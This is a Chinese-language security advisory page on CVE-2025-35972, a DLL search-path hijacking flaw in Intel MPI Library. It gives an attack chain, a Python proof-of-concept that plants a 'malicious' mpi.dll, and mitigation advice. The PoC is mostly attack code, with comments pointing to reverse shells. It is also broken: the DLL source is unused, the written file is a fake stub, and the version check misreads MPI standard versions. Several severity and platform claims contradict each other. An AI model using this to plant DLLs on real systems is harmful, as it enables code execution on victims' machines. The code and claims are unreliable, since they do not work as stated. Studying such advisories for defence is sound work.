CVE-2025-35972 Intel MPI Library 未受控搜索路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-35972

漏洞类型

未受控搜索路径/权限提升

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Intel MPI Library

漏洞概述

CVE-2025-35972是Intel MPI Library中的一个高危安全漏洞，存在于2021.16版本之前。该漏洞属于未受控搜索路径(Uncontrolled Search Path)类型，发生在用户应用程序层面(Ring 3)。攻击者可以利用此漏洞通过DLL预加载/DLL劫持技术实现本地权限提升。漏洞的成功利用需要满足多个条件：攻击者需要具备已认证用户的访问权限，需要进行高复杂度的攻击操作，且必须通过本地访问方式发起攻击，同时需要用户的主动交互。漏洞影响了系统的机密性、完整性和可用性三个安全属性，均为高影响级别。此漏洞由Intel安全团队发现并报告，编号为INTEL-SA-01386。

技术细节

该漏洞的根本原因在于Intel MPI Library在加载动态链接库(DLL)时使用了不安全的搜索路径。当应用程序调用MPI函数时，库文件会在多个预定义路径中搜索依赖的DLL文件。攻击者可以通过在搜索路径优先级较高的目录中植入恶意DLL文件来实现劫持攻击。典型的攻击场景是：攻击者首先在当前工作目录、用户临时目录或应用程序可访问的目录中放置一个与MPI库依赖同名的恶意DLL文件。当合法应用程序启动并调用Intel MPI Library时，加载器会按照搜索顺序优先找到攻击者植入的恶意DLL，从而执行任意代码。由于该漏洞需要本地访问权限，因此主要威胁场景为多用户环境或共享主机系统。攻击者需要具备在该系统中特定目录写入文件的权限，并且需要诱使目标用户执行使用Intel MPI Library的应用程序。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标系统上安装的Intel MPI Library版本，确认版本低于2021.16

STEP 2

2

准备阶段：攻击者在目标系统具有写权限的目录（如用户工作目录、临时文件夹等）中植入恶意DLL文件，文件名与Intel MPI Library依赖的合法DLL相同

STEP 3

3

诱导执行：攻击者诱使目标用户在该恶意DLL所在目录中启动使用Intel MPI Library的应用程序

STEP 4

4

DLL加载：应用程序调用Intel MPI函数时，加载器按照搜索路径顺序查找依赖DLL，优先找到攻击者植入的恶意DLL

STEP 5

5

代码执行：恶意DLL的DllMain函数被执行，攻击者实现任意代码执行，获得与目标用户相同的权限

STEP 6

6

权限提升：在特定场景下，攻击者可能利用获得的权限进一步提升至系统级权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-35972 PoC - DLL Preloading Attack
# Target: Intel MPI Library < 2021.16
# Attack Vector: Uncontrolled Search Path

import os
import ctypes
import shutil
from ctypes import wintypes

def create_malicious_dll():
    """
    Create a malicious DLL that will be loaded by Intel MPI Library
    This DLL creates a reverse shell or executes arbitrary code
    """
    dll_code = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Malicious code execution here
        // Could create a backdoor, execute shell commands, etc.
        MessageBox(NULL, "Intel MPI Library Loaded", "CVE-2025-35972", MB_OK);
        
        // Example: Execute calc.exe as proof of concept
        WinExec("calc.exe", SW_SHOWNORMAL);
        
        // In real attack: Establish reverse shell connection
        // system("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt");
    }
    return TRUE;
}
'''
    
    # Save malicious DLL
    with open('mpi.dll', 'wb') as f:
        f.write(b'MZ' + b'\x00' * 58 + b'\x90' * 64)
    
    return 'mpi.dll'

def exploit_cve_2025_35972(target_dir):
    """
    Exploit function for CVE-2025-35972
    Places malicious DLL in a directory that will be searched by Intel MPI Library
    """
    malicious_dll = create_malicious_dll()
    
    # Copy to target directory (e.g., user's working directory)
    target_path = os.path.join(target_dir, malicious_dll)
    shutil.copy(malicious_dll, target_path)
    
    print(f"[+] Malicious DLL placed at: {target_path}")
    print("[+] When user runs Intel MPI application from this directory,")
    print("[+] the malicious DLL will be loaded instead of the legitimate one")
    print("[+] This leads to arbitrary code execution with user's privileges")
    
    return target_path

def check_vulnerable_versions():
    """
    Check if Intel MPI Library version is vulnerable
    Vulnerable: < 2021.16
    """
    try:
        # Try to get Intel MPI version
        from mpi4py import MPI
        version = MPI.Get_version()
        print(f"[*] Intel MPI Version: {version}")
        
        # Parse version and check if vulnerable
        # Version format: (major, minor)
        major, minor = version
        if major < 2021 or (major == 2021 and minor < 16):
            print("[!] System is VULNERABLE to CVE-2025-35972")
            return True
        else:
            print("[+] System is NOT vulnerable (version >= 2021.16)")
            return False
    except Exception as e:
        print(f"[*] Could not determine MPI version: {e}")
        return None

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-35972 PoC - Intel MPI Library DLL Preloading")
    print("=" * 60)
    
    # Check if vulnerable
    is_vulnerable = check_vulnerable_versions()
    
    # For demonstration, exploit the vulnerability
    current_dir = os.getcwd()
    exploit_path = exploit_cve_2025_35972(current_dir)
    
    print("\n[*] Next step: Wait for user to run Intel MPI application")
    print("[*] The malicious DLL will be loaded automatically")

影响范围

Intel MPI Library < 2021.16 (所有Windows和Linux版本)

Intel MPI Library 2021.15及更早版本

使用受影响版本Intel MPI Library的所有应用程序

防御指南

临时缓解措施

作为临时缓解措施，用户应避免从不可信目录启动Intel MPI应用程序，确保工作目录不包含未授权的DLL文件。可以设置环境变量禁用当前目录的DLL搜索，或使用SetDllDirectory()函数明确指定安全的DLL搜索路径。同时，应限制用户对应用程序目录和系统目录的写权限，避免攻击者在关键位置植入恶意DLL文件。在多用户环境中，应实施严格的访问控制策略，防止低权限用户上传文件到共享目录。